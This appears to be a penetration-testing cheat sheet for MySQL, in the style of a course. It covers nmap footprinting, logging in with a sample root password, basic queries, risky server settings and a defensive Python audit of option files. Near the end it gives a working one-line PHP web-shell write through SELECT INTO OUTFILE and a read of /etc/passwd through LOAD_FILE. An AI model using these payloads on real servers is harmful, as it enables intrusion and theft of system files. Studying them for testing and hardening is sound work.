My Structured Query Language
Footprinting The Service
sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*


Interaction with the MySQL Server
mysql -u root -pP4SSw0rd -h 10.129.14.128

Commands
mysql -u <user> -p<password> -h <IP address>
Connect to the MySQL server. There should not be a space between the '-p' flag and the password.
show databases;
Show all databases.
use <database>;
Select one of the existing databases.
show tables;
Show all available tables in the selected database.
show columns from <table>;
Show all columns in the selected database.
select * from <table>;
Show everything in the desired table.
select * from <table> where <column> = "<string>";
Search for the needed string in the desired table.
Dangerous Settings
user
Sets which user the MySQL service will run as.
password
Sets the password for the MySQL user.
admin_address
The IP address on which to listen for TCP/IP connections on the administrative network interface.
debug
This variable indicates the current debugging settings.
sql_warnings
This variable controls whether single-row INSERT statements produce an information string if warnings occur.
secure_file_priv
This variable is used to limit the effect of data import and export operations.
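A defender-side check for the settings listed above, as an added example that is not part of the original page: it parses a MySQL option file and reports each of these settings when it is in a risky state. The sample option file is constructed for illustration, and the function names audit and is_loopback are hypothetical.

```python
import configparser
import ipaddress

# Constructed sample option file (illustrative values, not a real server's config).
SAMPLE_CNF = """\
!includedir /etc/mysql/conf.d/
[client]
password = P4SSw0rd
[mysqld]
user = root
admin-address = 10.129.14.128
debug
sql_warnings = ON
secure-file-priv = ""
"""

def is_loopback(addr):
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return addr == "localhost"

def audit(cnf_text):
    """Return sorted (section, option, finding) tuples for the settings listed above."""
    # '!include' directives are not INI syntax, so drop them before parsing.
    body = "\n".join(l for l in cnf_text.splitlines() if not l.lstrip().startswith("!"))
    cp = configparser.ConfigParser(allow_no_value=True, strict=False, interpolation=None)
    cp.read_string(body)
    findings = []
    for section in cp.sections():
        for raw_key, raw_val in cp.items(section):
            key = raw_key.replace("-", "_")  # MySQL accepts both spellings
            val = (raw_val or "").strip().strip("\"'")
            if key == "user" and section.startswith("mysqld") and val == "root":
                msg = "service runs as root"
            elif key == "password" and val:
                msg = "plaintext password stored in option file"
            elif key == "admin_address" and not is_loopback(val):
                msg = "administrative interface listens on a non-loopback address"
            elif key == "debug":
                msg = "debug tracing configured"
            elif key == "sql_warnings" and val.upper() in ("1", "ON", "TRUE"):
                msg = "information strings returned for single-row INSERT warnings"
            elif key == "secure_file_priv" and raw_val is not None and val == "":
                msg = "empty value: import/export not limited to a directory"
            else:
                continue
            findings.append((section, key, msg))
    return sorted(findings)
```

Calling audit(SAMPLE_CNF) returns six findings; an option file with a non-root user, a loopback admin_address and a directory path in secure_file_priv returns none.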
MySQL default system schemas/databases:
mysql - is the system database that contains tables that store information required by the MySQL server
information_schema - provides access to database metadata
performance_schema - is a feature for monitoring MySQL Server execution at a low level
sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
Write Local File
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

File Write Privileges
show variables like "secure_file_priv";

The secure_file_priv variable is empty, which means we can read and write data using MySQL.

Read Local File
select LOAD_FILE("/etc/passwd");

By default, a MySQL installation does not allow arbitrary file read, but if the correct settings are in place and with the appropriate privileges, we can read files.